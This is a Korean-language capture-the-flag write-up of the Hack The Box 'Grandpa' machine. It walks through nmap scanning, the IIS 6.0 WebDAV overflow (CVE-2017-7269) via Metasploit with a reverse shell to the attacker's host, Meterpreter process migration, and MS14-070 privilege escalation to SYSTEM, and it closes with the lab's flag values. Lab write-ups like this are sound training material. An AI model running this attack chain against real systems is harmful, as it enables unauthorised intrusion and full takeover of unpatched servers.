[Hackthebox] - Grandpa Writeup(문제풀이)

Granpa - Hackthebox

• References
  CVE-2017-7269 : Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
  CVE-2014-4076 : Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)

• 바로 이전의 Granny 문제와 유사하여 유사한 흐름으로 진행하였습니다.

# nmap -sV -sT -sC -Pn 10.10.10.14
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info: 
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Date: Thu, 03 Jun 2021 03:35:30 GMT
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

• IIS 6.0의 webdav 가 열려있음을 확인했습니다.

# msfconsole
msf6 > search iis 6.0 webdav
Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

• IIS 6.0 webdav 관련 취약점을 검색해보니 위와 같은 취약점이 발견되었습니다.

msf6 > use 0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.16
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

• 타켓 설정 후 exploit를 시도해보았습니다.

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.14:1031) at 2021-06-02 23:42:16 -0400
meterpreter > shell
Process 2308 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

• shell 접속 시 nt authority\network service 계정으로 접속됨을 확인하였습니다.

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  05:32 PM    <DIR>          .
04/12/2017  05:32 PM    <DIR>          ..
04/12/2017  05:12 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  05:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,092,687,360 bytes free

C:\Documents and Settings>cd Harry 
cd Harry
Access is denied.

• user flag 가 존재할 것으로 예상되는 디렉토리에 접근이 되지 않았습니다. Administrator 또한 마찬가지입니다. 해당 권한보다 더 높은 권한이 있을까 싶어 nt authority network service escalate privileges 에 관한 정보를 검색해보았습니다. 결론적으로 nt authority/system 권한이 있음을 알았습니다.
• 그리고 local exploit suggester 를 이용하여 system 으로의 권한 상승 가능 여부를 확인했습니다.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search local suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

• target에 알맞은 exploit tool을 선택 후 exploit을 시도하려고 해보았으나 아래와 같은 오류가 발생하였습니다.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit

[*] Started reverse TCP handler on 10.10.14.16:4445 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

• 뭔가 getsid 를 시도했으나 실패했다는 경고인 것 같아, 다시 기존 세션의 shell 에 접근하여 getuid 를 해보았을 때 문제를 알 수 있었습니다.

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

• 제대로 권한이 적용되지 않은 것 같았습니다. 그래서 Granny 에서 했던 것과 같이 실제 NT AUTHORITY/NETWORK SERVICE 권한으로 동작하는 프로세스에 본 프로세스를 migrate 한 뒤에 다시 getuid를 해보았을 때, 잘 나오는 것을 확인할 수 있었습니다.

meterpreter > migrate 1828
[*] Migrating from 2328 to 1828...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

• 이후 다시 local exploit 를 실행했을 땐 잘 됐습니다.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.16:4444 -> 10.10.10.14:1032) at 2021-06-03 00:27:49 -0400

• 아래는 flag 정보입니다.

C:\Documents and Settings\Harry\Desktop>type user.txt 
type user.txt
bdff5ec67c3cff017f2bedc146a5d869

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b